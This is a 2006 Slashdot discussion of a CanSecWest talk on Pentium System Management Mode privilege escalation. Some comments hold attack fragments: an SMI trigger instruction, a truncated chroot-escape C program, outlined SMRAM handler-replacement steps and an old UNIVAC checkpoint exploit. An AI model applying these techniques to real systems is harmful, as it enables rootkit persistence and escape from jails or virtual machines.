Pentium Computers Vulnerable to Attack? 227
An anonymous reader writes "One of the latest security scares is coming from security experts at CanSecWest/core '06 in the form of a possible hardware-specific attack. The attack is based on the built-in procedure that Pentium based chips use when they overheat. From the article: 'When the processor begins to overheat or encounters other conditions that could threaten the motherboard, the computer interrupts its normal operation, momentarily freezes and stores its activity, said Loïc Duflot, a computer security specialist for the French government's Secretary General for National Defense information technology laboratory. Cyberattackers can take over a computer by appropriating that safeguard to make the machine interrupt operations and enter System Management Mode, Duflot said. Attackers then enter the System Management RAM and replace the default emergency-response software with custom software that, when run, will give them full administrative privileges.'"
the sky is falling (Score:5, Funny)
Re:the sky is falling (Score:2)
It's a frustrating article (Score:4, Interesting)
The presentation lists events that will trigger a System Management Interrupt (SMI) and enter System Management Mode (SMM). Overheating is only one of them. Another is "century rollover". Taken literally, that would mean that anyone who could set the clock to 11:59 December 31 1999 [I'd say 2000 but I doubt the chip is mathematically correct] can enter SMM without needing physical access to the machine or to the circuit breaker for the air conditioning. Or to use the presentation's example, outl(0xB2, 0x0000000F);.
If I read this problem report [monkey.org] correctly, then a process outside of SMM can write to the memory for SMM. (Controlled by the D_OPEN bit in the SMM control register).
So it looks like you can do it without physical access, where "it" is a privilege escalation that *starts* from root. That's getting less absurd all the time as virtualization and technologies like SELinux become more common. Also allows planting a deeper-than-root rootkit. You could escalate to God of Hardware or in the CanSecWest example to "root at securelevel -1".
Maybe I should email Duflot for details and write up something for my nerdish security blog [berylliumsphere.com]
Aren't you already screwed? (Score:5, Interesting)
Re:Aren't you already screwed? (Score:3, Informative)
Re:Aren't you already screwed? (Score:5, Funny)
Re:Aren't you already screwed? (Score:3, Insightful)
1. They don't NEED to do any of it because they already own your box
2. The system designers really fucked the pooch good on the security design of these components
Come on even Windows knows that not just any Joe User should be able to reprogam the CPU interrupts...
Re:Aren't you already screwed? (Score:2, Insightful)
Re:Aren't you already screwed? (Score:2)
Re:Aren't you already screwed? (Score:2)
if you've got p4's installed in the machine, there's no need to fake anything, it's already in the package.
aside from joking, badly written software that puts way too much pressure on the cpu, can overheat a badly ventilated machine. in some countries you just have to syncrhonize your attack with the weather conditions (over here it pops over 40C in the summer, a bit load on the machine and it will overheat by itself, no torch needed).
and eventually there's no ultima
Re:Aren't you already screwed? (Score:2)
Re:Aren't you already screwed? (Score:3, Informative)
Think like an evil hax0r, then be afraid. (Score:5, Interesting)
> be used for is bypassing secure levels inside of OpenBSD, where you already have root.
People, think this through a bit and some more dangers appear. If root can replace System Management Mode there are some interesting possibilities for evil. SMM runs at permission levels beyond ring0, think of it as ring-1. From there you can escape any virtualization, any chroot jail, probably even escape from inside an emulator like VMWare if you can manage to execute the exploit without the emulation catching it and simulating it. Until this is completely understood and fixed, Xen, usermode linux, chroot and possibly VMWare/VirtualPC should be suspect.
Now imagine just how many people have root access to their virtual server at a hosting company and how many other users are running on the same physical hardware secure in the belief that their customer information is safe. But is it?
Re:Think like an evil hax0r, then be afraid. (Score:2)
chroot is *not* secure if attacker has root (Score:2)
If you've got root in a chroot "jail", you already own the machine. To break out of jail, just use a program such as the following (... and pass it a subdirectory within the "jail" as argument):
#include <stdio.h>
#include <unistd.h>
void main(int argc, char **argv)
{
int i;
if ( argc < 3 ){
fprintf(stderr,"Bad argument count\n");
exit(1);
}
if(chroot(argv[1])){
Re:Think like an evil hax0r, then be afraid. (Score:3, Insightful)
So does anything that can load before your kernel. (Like a boot sector virus.)
Now imagine just how many people have root access to their virtual server at a hosting company and how many other users are running on the same physical hardware secure in the belief that their customer information is safe. But is it?
This isn't really different than a boot sector. If you have root on a VIRTUAL server, you shouldn't have access to this or to the
Re:Think like an evil hax0r, then be afraid. (Score:3, Informative)
> the "real" OS)?
If it is a P-IV in a 1U rack I'd suspect all you would have to do would be chew CPU cycles like mad for a hour. It isn't that hard, most of the first batch of P-IV chips ran so hot they will only run at their rated speed for a few minutes without some serious aftermarket cooling solutions. So there are potentially a couple million machines out there which are especially vulnerable.
Re:Aren't you already screwed? (Score:2)
What about MMUs (Score:2, Informative)
Physical access (Score:4, Insightful)
Move along, folks.
Re:Physical access (Score:2)
"Physical access" is one of the reasons why wireless will never - well, not anytime soon, anyway - be fully secure.
Re:Physical access (Score:2)
Would you elaborate on that? I'm trying to understand the link between "Physical access" and "wireless".
I'm hoping that setting up an OpenBSD machine (sparc64) to be an AP where only authorized people who log into it through ssh are allowed access through it with authpf and then only IPSEC traffic, might be able to provide decent security.
Technically, you are correct. (Score:3, Interesting)
Having said that, I believe B3 security mandates that memory and other system resources have mandatory access controls for precisely this sort of reason - a user who already has sy
Re:Technically, you are correct. (Score:2)
Re:Physical access (Score:2)
The twist the virus can set the overheat temp very low, so its easy to trigger via the virus,
and the virus also does something akin to a bios flash that uploads a custom bios
instead of just nuking the bios like cmos death did
Its kinda like the firmware vulnerabilities that were present in some cheap routers
and in cisco's case not so cheap
it can be done remotely
Ex-M
Sensational headline about a poor article. (Score:5, Informative)
Re:Sensational headline about a poor article. (Score:5, Interesting)
FCW stands for Federal Computer Week, a trade rag that US gov't stooges use to figure out how to best waste our tax dollars of shiny boxes with blinky lights. Their topic headings include the buzzwords:
The anonymous submitter might do well to remain so. Scuttlemonkey, OTOH, may have to enter the witness protection program. He's getting as bad as Zonk.
RAM access? (Score:3, Insightful)
How is it that an unprivileged user can write to such a sensitive location in the first place?
Security Experts Untie! (Score:5, Funny)
Good Times (Score:5, Funny)
Then a few years later, Microsoft brought us Outlook with automatic attachment opening, making the first part possible, and now Intel has given us the potential for the second part.
Good Times apparently wasn't a hoax, it was just ahead of its times.
Re:Good Times (Score:2)
I think Commodore beat everyone up in terms of being ahead of time...try 1977! [6502.org]
Re:Good Times (Score:2)
Well, "hardware attacks" existed before too. There were some that would send your screen a refresh rate it couldn't handle, and it'd be destroyed (this is back in the text-mode days). Of newer things, some viruses would overwrite the BIOS, which I believe required reflashing in laptops which didn't have a ROM copy to reset to. Th
Re:Good Times (Score:5, Insightful)
The watershed for me, will always be the IE images exploits, where a malicious website could run code, simply by your browser attemtping to download a carefully crafted image file.
There I was, for years, telling people; "There's no way you can get a virus by just looking at an picture on the internet". Boy was I wrong.
Bottom line, not matter what you pronounce impossible through software, invariably, somewhere out there, there exists a bug to accomplish just that.
Headbanger Virus (Score:3, Informative)
It was also based a little in reality - CPUburn could theoretically destroy an improperly heat-sinked
Re:Headbanger Virus (Score:2)
There was on that overwrote the park command so it didn't actually park the heads.
There was an Apple Virus for the APPLE IIc(I think, maybe an earlier model) that changed where the heads read the disk. This trick was also a great way to hide data.
There have been a coupl PC virus that wrote to 13. Another that overwrote the MBR.
Now they are just inconvienant.
Re:Headbanger Virus (Score:2)
I looked into the possibility of using "dead space" (space left at the end of programs and other fixed-length files that canNOT be used by anything else), because when you load a program, you actually load complete sectors. It would have been easy to attach something to the disk int
Sensationalist (Score:5, Funny)
Along a similar vein, I have developed a martial art where I can kill anyone in one blow. It requires that my opponent is already tied-up, asleep, and I have a gun.
In other news... (Score:5, Funny)
Seriously, if they have access then you are screwed anyways...
- Andrew
Heh (Score:2)
Not being a retard still work, though? Right? (Score:4, Insightful)
Re:Not being a retard still work, though? Right? (Score:2)
If by firewall, you mean one made of masonry or asbestos, yes.
How do you even get it to overheat to begin with? (Score:2)
I heard, act of God includes "stupidity".
Re:How do you even get it to overheat to begin wit (Score:2)
Re:How do you even get it to overheat to begin wit (Score:2)
Re:How do you even get it to overheat to begin wit (Score:2)
Well I generally like to compliment it on how pretty it's power on indicator is.
Then I might buy it something small, superfluous and pretty like a tennis bracelet or an X800 Radeon.
After that I start gently caressing it's biometric module.
That generally gets it pretty hot...
The devil is in the details (Score:5, Insightful)
- The article states that all x86 processors "could" be vulnerable. Does that mean the *entire* series of Pentium chips, even the older PIII and PII's? If so, are they equally as easy to compromise as the modern versions?
- There is no mention of AMD architecture. Doesn't AMD have an equivalent "overheat failsafe" halt-and-cooldown function? Wouldn't that make AMDs vulnerable to this type of exploit as well, or do they require a slightly different attack?
- Isn't the motherboard BIOS FlashROM responsible for the monitoring of and responding to dangerous CPU temperatures? Haven't they already been safeguarded against unauthorized writes, due to the Chernobyl virus?
I think I'll hold off on ordering the prototype Borg implants when they come on the market....
Not Very Long Lived... (Score:2)
Re:Not Very Long Lived... (Score:2)
What Microsoft said... (paraphased) (Score:2)
Good thing macs aren't vulnerable. (Score:5, Funny)
A few more details (Score:5, Informative)
Re:A few more details (Score:5, Informative)
Linux and *BSD have a /dev/mem device interface for accessing physical memory from user space. Usually, this device only allows access from a priviledged user:
Using /dev/mem, it should be possible to access the address range assigned to system management RAM. However, the CPU has a Model-Specific Register (MSR) for enabling and disabling accesses to SM RAM. The instructions that are used to read and write MSRs (RDMSR and WRMSR) must be executed from ring-0 (kernel level) or else a GPF occurs. However, the Linux kernel can be configured to provide a user level interface to MSRs via:
Again, you'll probably need root priviledges to access the device.
Re:A few more details (Score:2)
Who says the system management ram is accessible by MSRs?
Seems like there isn't enough on-die space to save the entire state of the O/S, and MSR writing is painfully slow, so it wouldn't have time to dump everything INSIDE the core before triggering thermal protection.
More details? Anyone? Anyone?
exploit schmexploit (Score:2)
I ran it, and now my computer is "resting" for a few days.
Take that Loic Duflot
(if you want the link, just let me know, and when I boot up my new 6, I'll send it to you)
--
I just put some lightnin' in my Dell
Semi Permanent Backdoor? (Score:3, Insightful)
Or am I confused?
A "1" (Score:2)
Sure it is probably possible, but then I suppose it would be possible to retrofit my truck into a boat. Heck, it would probably be easier and faster to do that than it would be to
UNIVAC had similar vulnerability in checkpoint (Score:4, Interesting)
The crack:
1. Checkpoint your job to tape.
2. remount tape.
3. fiddle the executive-mode bit in the dumped status register.
4. remount tape.
5. restart job -- mainframe p0wn3d.
Of course, in those days, a student that could do that was quickly hired into the system programming staff so that they could keep a closer eye on him and also get some productive work from him.
Ohh... BTW... if you can find an 1100/10 these days, it won't work any more. They fixed that about the same time they quit making CPU's out of vacuum tubes.
I wish Intel would create new bugs, instead of just repeating old ones. Copycats.
Just think, the script kiddies that pulled this off are now drawing Social Security.
I'm Safe (Score:2, Funny)
Not only do you receive a convenient olfactory signal to alert you to the situation, but you also avoid security breaches brought on by overly complex thermal management.
i heard about this! (Score:2)
Recommended work around (Score:2)
All Pentiums also vulnerable to DoS (Score:5, Funny)
Pentium based machines are also vulnerable to a denial of service attack from a hacker with physical access to the machine and in the possession of a large axe. Should the attacker be wielding a pair of axes (one in each hand) then the attack would constitute a distributed denial of service.
Next James Bon movie script excerpt: (Score:2)
evil hacker spotted... (Score:2)
film at 11
Better article: no FUD-OpenBSD demo-Theo comment (Score:4, Informative)
cansecwest/core06: "security issues related to Pentium SMM"
Loic Duflot
Title: Security Issues Related to Pentium System Mgmt Mode
It is day 2 at Cansecwest and this talk wins for 'so frightening that you want to hide under your desk in the fetal position'.
I'll go through the high level technical and then end with pointing out a principal that is one of those universal truths I carry around with me everywhere.
This entire exploit is based on documented x86 functions.
Your CPU runs in a few modes, one of those modes is known as Protected mode, other known as System Mgmt Mode. When your OS is running, your in Protected mode and this is how much of the security is performed and you'll hear of ring0 and ring3. Just know that your in-world universe is in protected mode.
System Management Mode (SMM) is used so that when there is something external to your OS world like say a thermal condition that needs to communicate some message, the CPU saves all its protected mode state out, does all this SMM stuff and then return to its regular scheduled program in protected mode.
There are details that evolve registry addresses and very low level operations but for the most part, a system in a very secure state can be circumvented via this SMM facility. I'm talking free access to all memory and IO.
The song goes a little like this:
Enable SMI
Open SMRAM space
Replace default SMI Handler by custom one (do your duty)
Close SMRAM space
Trigger SMI
Gain access to restricted operations.
In the wider picture: works on most systems. Turns out that Linux and the *BSD's will fall victim to this attack strategy, however, Windows XP is not known to be exploitable because of a few system calls that are not present and more importantly a certain memory range in protected mode is not shared addresses to SMM.
So, for the demo, they did not pick some shabby OS to exploit. How about OpenBSD at level2 (high security) with allowaperture=1
Ummm...it worked. Theo, microphone please?
Theo spoke to this OPENBSD issue and said he and the team have known about it for a year. They are between a rock and a hard-place because Xserver is really the core of the problem. It has too much damn access to regesters and is in the most unfortunate address space in protected mode because when in SMM, what is in that address range can be used to exploit.
Solution is for Xserver people to abstract sufficiently so that the kernel can have more governance on the Xservers logic.
Closing TK comments:
A system or a world that has a policy governed by in-world mechanisms cannot be effective when a process in-world can reach to the out-world to cause in-world change. You could also say that since a problem cannot be resolved at the same logical realm it has been created, then it is also the case that the most effective governance of a world can only come from outside that world. Think about all the crazy things we do in the physical world. As soon as we could get to the strong and weak forces at the atomic level, we created a incredibly destructive device. I just hope that if string theory is right and there really are energy strings at the lowest level of the universe, that no one in our world get control of them. The negative outcome caused by the power hungry is too high a risk to even consider the positive benefits.
Its late and I have been blogging way too much today I am certain that my mental packet loss is abnormally high. I'll return to this in-game out-game concepts later in another blog entry, when I am less sleep deprived.
--tk
Not really an exploit (Score:3, Insightful)
By the way, whenever the CPU does a memory read or write while in SMM, it asserts the SMM# pin. This means that
Too much hassle (Score:2)
Works just as fine.
reminds me attacking VM's via physical memory... (Score:2)
Yea, it was
This guy shouldn't be allowed to write... (Score:2)
Where to begin.
First off, none of the low-power states C0->C4 stash to a system management RAM (yet). Second, the lower Cx states flush the cache, but they don't flush in response to heat, in that case they perform a Geyserville transaction which lowers frequency and voltage. Only if you exceed the thermal diode does it go tits-up. Now there's word it may save state in future Cx states, but I sincerely doubt anyone would be able to get inside the on-die ram, since it will sit beh
Concern (Score:2)
However, if you attack the driver of a secure card at the same time as you are thermally stressing it, you may be able to take it over, extracting the key data without triggering the tamper evident seals.
Fortunately, security cards that I am familiar with do NOT use Intel
Re:FUD? (Score:2)
Re:FUD? (Score:5, Insightful)
When the processor begins to overheat or encounters other conditions that could threaten the motherboard, the computer interrupts its normal operation, momentarily freezes and stores its activity,
Ok, fine.
Every computer that runs on x86 chip architecture may be vulnerable to this attack
Wait. How did we get here?
Let's go through this, again. Intel Pentium 4s are hot. No surprise there. They enter special modes when overheating that may introduce a security vulnerability. Fine. How does this cross over to AMD and Via chips again? AMD and Via processors don't have special modes like that. If system heat becomes critical they will simply shut the system down flat out. On a Pentium 4, overheating is not entirely unexpected, particularly on the high edge of the clock speeds. On an AMD or Via, overheating is a major failure condition, probably caused by a heatsink falling off.
So, how are all x86 chips vulnerable, exactly? (Incidentally, between this and this [daemonology.net], AMD is really looking to be a much safer deal, not to mention faster, cooler, more power efficient, etc.)
Re:FUD? (Score:3, Informative)
You are a little off. What a P4 does is "speed stepping" where if it is overheating it will down the clock and avoid areas on the chip that are the hottest, if it gets too hot it will shut down completely. This is desi
Re:FUD? (Score:2)
Yeah, because heatsinks coming unlatched all by themselves and falling off has been shown to be a common occurence.
Re:FUD? (Score:3, Interesting)
It happened to my wife's computer. The case is behind her desk, so I'm pretty sure nobody was picking it up and dropping it. One day it started spontaneously turning off after only a few minutes of use. After a little frustration at not even being able to complete any diagnostics on my CD, I finally pulled the desk out and opened the case up. I found the heatsick hanging from one peg, and the
Re:FUD? (Score:2)
Years ago I scored myself an Athlon 700 which was thrown out. When I got it home, guess what... heatsink had become unlatched and fell off enough to loose contact with the CPU. I fixed the dodgy latch hooks and it's been great for the past 4 years or so.
The person who threw it out was probably fed up with the few minutes of uptime they could get. ; )
Re:FUD? (Score:2)
Re:FUD? (Score:3, Informative)
AMD added this feature in the Athlon XP (maybe not th
Re:FUD? (Score:2)
Re: (Score:2)
Re:FYI (Score:2)
Are you sure it was motherboard makers and not Microsoft with Windows?
Re:FUD? (Score:2)
Re:FUD? (Score:2)
So every now and then the CPU fan would crap. This was only and AMD K6-2 500Mhz chip but when that baby got hot, Windows 2K would BSOD like crazy. That was my cue to go out and buy another fan for $5.00. Hey, they lasted a year or so each so no big deal.
So that's how AMD chips respond to overheat, at least in my experience.
Re:FUD? (Score:2)
It dumps heat quite well. And I do have a job,very nice one in fact. And the ad hominem attack wasn't very nice. I'm going to have to tell your momma.
AMD overheat (Score:2)
As a longtime AMD and VIA user, I would call bullshit on that. With VIA, certainly (my Epias are rather low power, lower heat), but most of my AMD's have run rather hot-ish
K6-2/400 - Same as P-II
"Thunderbird" 700Mhz - Not hot, but no cooler than the same-gen Pentiums.
Duron 1Ghz - Power-hungry and hot enough to raise the room temperature noticably when run in a server
Athon XP 2500+ - Holy-freakin' he
Re:FUD? (Score:2)
FUD? Judge for yourself. (Score:2)
So, here's a link to the actual PowerPoint presentation [cansecwest.com]. Don't just click on it without reading the caveats below.
He has a sample exploit there on an OpenBSD system.
Here's the guy's bio from the talk:
Loïc Duflot
Security Issues related to Pentium System Management Mode
Loïc Duflot is a security enginee
Re:FUD? (Score:2)
Naw, AMD chips don't enter hardware interrupt mode when they overheat, they violently explode: http://www.azfar.name.my/2005/02/amd-duron-explode .php [azfar.name.my].
Re:Isn't it about time (Score:2)
Fear the consequences of creating Pentium chips? I'm no fan of Intel, myself, but that seems a bit extreme.
Re:Isn't it about time (Score:2)
parent is obviously scared by computers and computer crime. news flash, all computers have some sort of security problem. you cant lock people up and think that will solve all the computer security problems so you can sleep well at night. people who are clueless about computers advocate such hard line policies. its ignorance and fear and wanting to do something -anything- no matter how completely irrelevant and meaningless that action is.
Re:Isn't it about time (Score:2)
Also, many of the people doing these things are stupid kids. Come on, $25 for a 10,000 node botnet? That's someone who wants money to play whatever online game is hot these days, not someone
Re:Isn't it about time (Score:2)
Re:Isn't it about time (Score:2)
Re:Isn't it about time (Score:2)
"No sprinkles. For every sprinkle I find, I shall kill you."
Re:Remember the F00F bug? (Score:2)
Uh, no (Score:2)
Re:But how? (Score:2, Interesting)
SMM is present on many x86 processors and dates back to the days of NeXGen and Cyrix and 486s. It is basically a real-like mode of the x86 processor where certain hardware emulation type operations are performed.
The SMM software usually resides at A000:0000 which is normally video memory in a PC. However, in SMM the address decoder actually mapps those addresses to physical RAM and runs the SMM k
Re:I think Im covered (Score:2)
Re:Wait wait wait (Score:3, Interesting)
Come to think of it, I had an old HP that integrated a fan controller on the motherboard. It might have been hardware-only, though.
Seems like a lot of hacking for a small payoff, but I think the path is there for some systems.
Re:Wait wait wait (Score:2)
It's possible to kill the daemon or boot up without launching it, but in the event of this, the hardware has a "fail s
ummm (Score:2)